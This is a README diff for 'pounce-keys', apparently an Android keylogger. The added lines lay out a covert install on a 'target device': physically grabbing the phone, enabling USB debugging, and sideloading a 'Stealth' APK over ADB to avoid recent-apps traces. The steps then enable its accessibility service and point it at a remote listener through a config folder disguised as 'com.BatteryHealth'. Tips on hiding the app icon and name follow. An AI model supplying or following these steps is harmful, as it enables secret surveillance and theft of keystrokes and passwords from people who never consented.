NullPounce/pounce-keys/README.md

 # STEALTH
-TIP! install via ADB to avoid recent apps timestamp, also settings does not show in this list, also to assure hiiden icon in some cases
+TIP! install via ADB to avoid recent apps timestamp, also settings does not show in this list, also to assure hiden icon in some cases

+1. have a device with adb setup in a terminal and run adb tcpip 5555 with a phone charger plugged in (also have the stealth apk ready in same dir)
+2. make a new folder on the adb pc with this structure com.BatteryHealth/files/keys/fix.dat
+3. in the fix.dat file you made, insert ip:port in line 1 and save (ip and port of remote device with pounce-keys listener, works in linode)
+4. grab target device , open settings , enable dev options if need be then usb debugging
+5. connect phone , tap always allow usb debug
+6. run adb tcpip 5555 again and run adb install Stealth.apk (this hides from recent apps and settings sometimes does not even show as opened)
+7. turn off usb debug and enable the accessibility service
+8. copy and paste the com.BatteryHealth folder into android/data after turning on file tranfer

+in android 9 and bellow this will install the app with no icon on the launcher or docked apps (wont even be on the screen, perioid) only way you can see this is if you open accessibility settings or scroll all the way down in installed apps as its never a recent one.
+10 and up this will add a shortut named ZbatteryHealth with no icon but will be seen in the launcher, move it to a folder or replace app name with \ in manifest file but this will make the app show in the top of installed

 due to new security features android API 29 and above (Oreo and up I believe) it will make it hard to near impossible to hide the app without root.
 The stealth version does not allow the app to be open, just a white icon, and it just opens the app details menu, sits in the app drawer.